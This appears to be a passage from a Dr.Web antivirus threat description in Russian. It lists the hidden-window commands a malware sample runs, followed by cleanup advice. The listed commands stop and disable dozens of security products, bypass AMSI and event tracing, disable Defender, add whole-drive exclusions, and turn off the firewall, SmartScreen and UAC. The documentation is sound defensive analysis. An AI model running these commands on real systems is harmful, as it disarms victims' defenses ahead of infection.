  • '<SYSTEM32>\cmd.exe' /c "sc stop "SAVService"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "SAVService" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "swi_service"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "swi_service" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "TMBMServer"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "TMBMServer" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "TmListen"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "TmListen" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "TmProxy"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "TmProxy" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "CmdAgent"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "CmdAgent" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "cmdvirth"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "cmdvirth" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "WRSA"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "WRSA" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "WRCoreService"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "WRCoreService" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "PandaAetherAgent"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "PandaAetherAgent" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "PSUAService"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "PSUAService" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "F-Secure Gatekeeper Handler Starter"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "F-Secure Gatekeeper Handler Starter" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "FSMA"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "FSMA" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "FSDFWD"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "FSDFWD" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "AVKWCtl"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "AVKWCtl" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "AVKProxy"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "AVKProxy" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "a2AntiMalware"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "a2AntiMalware" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "a2service"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "a2service" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "vsmon"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "vsmon" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "zlclient"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "zlclient" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($nul... (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_e... (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config WinDefend start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop WinDefend" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config WdNisSvc start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop WdNisSvc" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config Sense start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop Sense" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Disa... (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c ""%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Set-MpPreference -MAPSReporting Disabled"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%APPDATA%'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%HOMEPATH%'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%WINDIR%\Temp'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "netsh advfirewall set allprofiles state off" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "netsh firewall set opmode mode=disable" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v EnabledV9... (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop "WinDefend"
  • '<SYSTEM32>\sc.exe' stop "McAfee McShield"
  • '<SYSTEM32>\sc.exe' stop "WdNisSvc"
  • '<SYSTEM32>\sc.exe' config "WinDefend" start= disabled
  • '<SYSTEM32>\sc.exe' config "NS" start= disabled
  • '<SYSTEM32>\sc.exe' config "epfwwfp" start= disabled
  • '<SYSTEM32>\sc.exe' stop "KLIF"
  • '<SYSTEM32>\sc.exe' config "CmdAgent" start= disabled
  • '<SYSTEM32>\sc.exe' config "SecurityHealthService" start= disabled
  • '<SYSTEM32>\sc.exe' config "WdNisSvc" start= disabled

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке